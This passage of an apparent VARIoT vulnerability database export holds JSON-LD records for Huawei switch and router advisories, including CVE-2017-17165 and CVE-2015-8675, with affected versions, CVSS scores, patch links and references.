      data: "IPv6 function in Huawei Quidway S2700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, S2300 V200R003C00, V200R003C00SPC300T, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S2700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5300 V200R003C00, V200R003C00SPC300T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R005C05, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5700 V200R003C00, V200R003C00SPC316T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S600-E V200R008C00, V200R009C00, S6300 V200R003C00, V200R005C00, V200R007C00, V200R008C00, V200R009C00, S6700 V200R003C00, V200R005C00, V200R005C01, V200R005C02, V200R007C00, V200R008C00, V200R009C00 has an out-of-bounds read vulnerability. An unauthenticated attacker may send crafted malformed IPv6 packets to the affected products. Due to insufficient verification of the packets, successful exploit will cause device to reset. plural Huawei The product contains an out-of-bounds vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Huawei Quidway S2700 and other Huawei S series switches are Huawei products. The following products and versions are affected: Huawei Quidway S2700 V200R003C00SPC300 Version; Quidway S5300 V200R003C00SPC300 Version; Quidway S5700 V200R003C00SPC300 Version; S2300 V200R003C00 Version, V200R003C00SPC300T Version, V200R005C00 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R009C00 Version; S2700 V200R005C00 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R009C00 Version; S5300 V200R003C00 Version, V200R003C00SPC300T Version, V200R003C00SPC600 Version, V200R003C02 Version, V200R005C00 Version, V200R005C01 Version, V200R005C02 Version, V200R005C03 Version, V200R005C05 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R009C00 Version ; S5700 etc",
      sources: [
         {
            db: "NVD",
            id: "CVE-2017-17165",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-012598",
         },
         {
            db: "CNVD",
            id: "CNVD-2017-37845",
         },
         {
            db: "VULHUB",
            id: "VHN-108160",
         },
      ],
      trust: 2.25,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2017-17165",
            trust: 3.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-012598",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201712-682",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2017-37845",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-108160",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37845",
         },
         {
            db: "VULHUB",
            id: "VHN-108160",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-012598",
         },
         {
            db: "NVD",
            id: "CVE-2017-17165",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201712-682",
         },
      ],
   },
   id: "VAR-201802-0445",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37845",
         },
         {
            db: "VULHUB",
            id: "VHN-108160",
         },
      ],
      trust: 1.5635795166666666,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37845",
         },
      ],
   },
   last_update_date: "2023-12-18T13:13:58.752000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "huawei-sa-20171213-01-ipv6",
            trust: 0.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171213-01-ipv6-en",
         },
         {
            title: "A variety of Huawei products IPv6 protocol cross-boundary read vulnerability patch",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/111423",
         },
         {
            title: "Multiple Huawei Product Buffer Error Vulnerability Fix",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=77220",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37845",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-012598",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201712-682",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-125",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-108160",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-012598",
         },
         {
            db: "NVD",
            id: "CVE-2017-17165",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171213-02-ipv6-en",
         },
         {
            trust: 0.8,
            url: "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-17165",
         },
         {
            trust: 0.8,
            url: "https://nvd.nist.gov/vuln/detail/cve-2017-17165",
         },
         {
            trust: 0.6,
            url: "http://www.huawei.com/cn/psirt/security-advisories/2017/huawei-sa-20171213-02-ipv6-cn",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37845",
         },
         {
            db: "VULHUB",
            id: "VHN-108160",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-012598",
         },
         {
            db: "NVD",
            id: "CVE-2017-17165",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201712-682",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2017-37845",
         },
         {
            db: "VULHUB",
            id: "VHN-108160",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-012598",
         },
         {
            db: "NVD",
            id: "CVE-2017-17165",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201712-682",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2017-12-22T00:00:00",
            db: "CNVD",
            id: "CNVD-2017-37845",
         },
         {
            date: "2018-02-15T00:00:00",
            db: "VULHUB",
            id: "VHN-108160",
         },
         {
            date: "2018-03-23T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2017-012598",
         },
         {
            date: "2018-02-15T16:29:02.250000",
            db: "NVD",
            id: "CVE-2017-17165",
         },
         {
            date: "2017-12-21T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201712-682",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2017-12-22T00:00:00",
            db: "CNVD",
            id: "CNVD-2017-37845",
         },
         {
            date: "2018-03-07T00:00:00",
            db: "VULHUB",
            id: "VHN-108160",
         },
         {
            date: "2018-03-23T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2017-012598",
         },
         {
            date: "2018-03-07T15:09:10.087000",
            db: "NVD",
            id: "CVE-2017-17165",
         },
         {
            date: "2017-12-21T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201712-682",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201712-682",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei Product out-of-bounds vulnerability",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2017-012598",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "buffer error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201712-682",
         },
      ],
      trust: 0.6,
   },
}

var-201601-0158
Vulnerability from variot

Huawei S5300 Campus Series switches with software before V200R005SPH008 do not mask the password when uploading files, which allows physically proximate attackers to obtain sensitive password information by reading the display. HuaweiEthernetSwitch is an Ethernet switch product from China Huawei. A security vulnerability exists in HuaweiEthernetSwitch, which allows an attacker to submit a special request for sensitive information. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. There is a security vulnerability in the Huawei S5300 using software versions earlier than V200R005SPH008. The vulnerability stems from the fact that the program does not hide passwords when uploading files

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0158",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c02",
         },
         {
            model: "s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r005sph008",
         },
         {
            model: "ethernet switches",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r005c02",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r005sph008",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-00361",
         },
         {
            db: "BID",
            id: "80359",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-006831",
         },
         {
            db: "NVD",
            id: "CVE-2015-8675",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201601-272",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r005c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2015-8675",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The vendor reported the issue.",
      sources: [
         {
            db: "BID",
            id: "80359",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2015-8675",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "LOCAL",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 2.1,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 3.9,
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "LOW",
                  trust: 1,
                  vectorString: "AV:L/AC:L/Au:N/C:P/I:N/A:N",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Local",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 2.1,
                  confidentialityImpact: "Partial",
                  exploitabilityScore: null,
                  id: "CVE-2015-8675",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Low",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:L/AC:L/Au:N/C:P/I:N/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "LOCAL",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 2.1,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  id: "CNVD-2016-00361",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "LOW",
                  trust: 0.6,
                  vectorString: "AV:L/AC:L/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "LOCAL",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "NONE",
                  baseScore: 2.1,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 3.9,
                  id: "VHN-86636",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "LOW",
                  trust: 0.1,
                  vectorString: "AV:L/AC:L/AU:N/C:P/I:N/A:N",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "LOCAL",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 6.2,
                  baseSeverity: "MEDIUM",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 2.5,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2015-8675",
                  trust: 1,
                  value: "MEDIUM",
               },
               {
                  author: "NVD",
                  id: "CVE-2015-8675",
                  trust: 0.8,
                  value: "Low",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2016-00361",
                  trust: 0.6,
                  value: "LOW",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201601-272",
                  trust: 0.6,
                  value: "LOW",
               },
               {
                  author: "VULHUB",
                  id: "VHN-86636",
                  trust: 0.1,
                  value: "LOW",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-00361",
         },
         {
            db: "VULHUB",
            id: "VHN-86636",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-006831",
         },
         {
            db: "NVD",
            id: "CVE-2015-8675",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201601-272",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei S5300 Campus Series switches with software before V200R005SPH008 do not mask the password when uploading files, which allows physically proximate attackers to obtain sensitive password information by reading the display. HuaweiEthernetSwitch is an Ethernet switch product from China Huawei. A security vulnerability exists in HuaweiEthernetSwitch, which allows an attacker to submit a special request for sensitive information. \nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. There is a security vulnerability in the Huawei S5300 using software versions earlier than V200R005SPH008. The vulnerability stems from the fact that the program does not hide passwords when uploading files",
      sources: [
         {
            db: "NVD",
            id: "CVE-2015-8675",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-006831",
         },
         {
            db: "CNVD",
            id: "CNVD-2016-00361",
         },
         {
            db: "BID",
            id: "80359",
         },
         {
            db: "VULHUB",
            id: "VHN-86636",
         },
      ],
      trust: 2.52,
   },
   exploit_availability: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            reference: "https://www.scap.org.cn/vuln/vhn-86636",
            trust: 0.1,
            type: "unknown",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-86636",
         },
      ],
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2015-8675",
            trust: 3.4,
         },
         {
            db: "BID",
            id: "80359",
            trust: 1.6,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-006831",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201601-272",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2016-00361",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-86636",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-00361",
         },
         {
            db: "VULHUB",
            id: "VHN-86636",
         },
         {
            db: "BID",
            id: "80359",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-006831",
         },
         {
            db: "NVD",
            id: "CVE-2015-8675",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201601-272",
         },
      ],
   },
   id: "VAR-201601-0158",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-00361",
         },
         {
            db: "VULHUB",
            id: "VHN-86636",
         },
      ],
      trust: 1.4677305,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-00361",
         },
      ],
   },
   last_update_date: "2023-12-18T13:34:27.129000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Huawei-SA-20160112-01-Switch",
            trust: 0.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160112-01-switch-en",
         },
         {
            title: "HuaweiEthernetSwitch Local Information Disclosure Vulnerability Patch",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/70248",
         },
         {
            title: "Huawei S5300 Fixes for local information disclosure vulnerabilities",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=59611",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-00361",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-006831",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201601-272",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-255",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-86636",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-006831",
         },
         {
            db: "NVD",
            id: "CVE-2015-8675",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160112-01-switch-en",
         },
         {
            trust: 1.2,
            url: "http://www.securityfocus.com/bid/80359",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8675",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-8675",
         },
         {
            trust: 0.3,
            url: "http://www.huawei.com",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-00361",
         },
         {
            db: "VULHUB",
            id: "VHN-86636",
         },
         {
            db: "BID",
            id: "80359",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-006831",
         },
         {
            db: "NVD",
            id: "CVE-2015-8675",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201601-272",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2016-00361",
         },
         {
            db: "VULHUB",
            id: "VHN-86636",
         },
         {
            db: "BID",
            id: "80359",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-006831",
         },
         {
            db: "NVD",
            id: "CVE-2015-8675",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201601-272",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2016-01-20T00:00:00",
            db: "CNVD",
            id: "CNVD-2016-00361",
         },
         {
            date: "2016-01-15T00:00:00",
            db: "VULHUB",
            id: "VHN-86636",
         },
         {
            date: "2016-01-12T00:00:00",
            db: "BID",
            id: "80359",
         },
         {
            date: "2016-01-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2015-006831",
         },
         {
            date: "2016-01-15T19:59:00.117000",
            db: "NVD",
            id: "CVE-2015-8675",
         },
         {
            date: "2016-01-15T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201601-272",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2016-01-20T00:00:00",
            db: "CNVD",
            id: "CNVD-2016-00361",
         },
         {
            date: "2016-01-21T00:00:00",
            db: "VULHUB",
            id: "VHN-86636",
         },
         {
            date: "2016-01-12T00:00:00",
            db: "BID",
            id: "80359",
         },
         {
            date: "2016-01-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2015-006831",
         },
         {
            date: "2016-01-21T17:29:09.397000",
            db: "NVD",
            id: "CVE-2015-8675",
         },
         {
            date: "2016-01-18T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201601-272",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "local",
      sources: [
         {
            db: "BID",
            id: "80359",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201601-272",
         },
      ],
      trust: 0.9,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei S5300 Vulnerability in the acquisition of important password information in series switch software",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2015-006831",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "trust management",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201601-272",
         },
      ],
      trust: 0.6,
   },
}

var-201610-0306
Vulnerability from variot

Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 make it easier for remote authenticated administrators to obtain and decrypt passwords by leveraging selection of a reversible encryption algorithm. plural Huawei There is a vulnerability in the product software that can obtain and decrypt passwords. Supplementary information : CWE Vulnerability type by CWE-326: Inadequate Encryption Strength ( Incorrect cipher strength ) Has been identified. http://cwe.mitre.org/data/definitions/326.htmlA remotely authenticated administrator can use a choice of reversible encryption algorithms to obtain and decrypt passwords. Huawei AR Routers is an AR series router product from China Huawei. An information disclosure vulnerability exists in Huawei AR Routers. An attacker could exploit this vulnerability to obtain sensitive information. Huawei AR, etc. are routing switches of China Huawei (Huawei). The following products and versions are affected: Huawei AR V200R001 , V200R002 , V200R003 , V200R005C10 , V200R005C20 , V200R005C30 ; Quidway S9300 V200R003C00SPC500 , V200R002C00SPC100 , V200R001C00SPC300 ; S12700 V200R006C00 , V200R005C00 ; S9300 V200R006C00SPC500 , V200R005C00SPC300 ; Quidway S5300 V200R001C00SPC300

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
